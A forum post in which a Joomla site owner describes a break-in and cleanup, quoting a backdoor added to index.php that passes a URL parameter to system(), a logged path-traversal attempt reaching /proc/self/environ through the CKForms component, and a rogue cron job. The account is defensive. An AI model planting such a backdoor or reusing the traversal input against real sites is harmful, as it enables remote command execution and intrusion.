A Joomla site I'm running was hacked the other day. The hacker dropped some files into the tmp directory and was running an HTTP Daemon there somehow (at least that's what my host told me). At any rate, I've been trying to clean up the files they left behind and secure what I can, but in checking my logs I noticed a hit on www.domain.com/?cmd=ls. This seemed strange to me, so I tried it... and lo and behold it lists all the files in the root directory of my site. Can someone explain to me why this is happening and how I stop it? This seems like a huge exploit, which I'd like to eliminate immediately.
Update: In digging I noticed a few extra lines added to my Joomla index.php:
if ($_GET['cmd']!=null) {
system($_GET['cmd']);
}
I've removed these, but am curious to know how the attacker managed to edit these to begin with. Not really sure where to look to make sure I've closed any back doors.
More Updates: First let me say that yes, I realize the proper course of action here is to blow the site away and restore from backup. However I'd prefer to leave that as a last resort since (a) it's a site that depends on community contributions and my backups aren't that recent (my fault, I know) and (b) I'm working on a new version that should be ready soon. But since I seem to be getting some assistance here I'll add some of the other things that I found/did in an attempt to fix this situation.
Found some .kin (or something like that - didn't make note of it and deleted it right away) directory in my /tmp folder which was obviously where this http daemon was running from. I'm assuming that the gunzip (mentioned below) was how this was placed here.
In my error_log files I found the following suspect entries (the "..." is my attempt to remove the path/filenames from this post):
[04-Jul-2010 09:45:58] PHP Fatal error: Class 'CkformsController../../../../../../../../../../../../../../../proc/self/environ' not found in ... on line 24
[05-Jul-2010 12:31:30] PHP Notice: Undefined index: HTTP_USER_AGENT in ... on line 92
[04-Jul-2010 06:41:52] PHP Warning: rmdir(...) [<a href='function.rmdir'>function.rmdir</a>]: Directory not empty in ... on line 1719
I've updated the CKForms component (which was listed as having a known exploit with the version I was running), as well as another component listed in the HTTP_USER_AGENT message.
In my stat logs I found that the same IP address attempted the ?cmd=ls twice, so I blocked that IP (somewhere in Indonesia).
I updated my Joomla installation to the latest.
I found system.ph and system.php files in my root which had a gunzip/base64 encoded string, which I deleted.
I've gone through all of the directories within the installation where the timestamp is recent to see if any abnormal files exist.
Deleted a cron job pointing to .../tmp/.kin/up2you >/dev/null 2>&1
Also, I'd be concerned that even if I did restore from a backup, whatever exploit used would still exist, so root cause and prevention is really what I'm going for here.